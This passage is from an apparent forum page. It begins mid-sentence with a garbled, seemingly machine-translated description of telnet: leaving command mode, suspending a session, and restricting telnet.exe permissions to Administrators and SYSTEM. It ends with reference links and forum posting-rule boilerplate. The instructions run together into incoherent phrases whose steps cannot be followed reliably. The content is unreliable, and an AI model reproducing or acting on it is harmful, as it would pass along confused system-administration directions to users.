the session and return to quit to exit the command mode telnet, telnet back into the local machine to suspend the state z to the end of the command way, way back telnet.exe telnet session proposed changes the security permissions, delete all of the users only save all the permissions for the Administrators and SYSTEM Atlas Atlas entry for more reference materials 1
Telnet detailed description
http://technic.xkq.com/20090602/96261.html
2
-depth understanding of the remote Log in standard protocols Telnet
http://technic.xkq.com/20090225/24188.html
Further reading: 1
http://technic.xkq.com/20090602/96261 . html Telnet Advanced Raiders
Open Category: Computer, telnet, login to perfect my
|
|
|
Thread Tools |
Search this Thread |
|
|
Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT. The time now is 01:17 AM.
|
|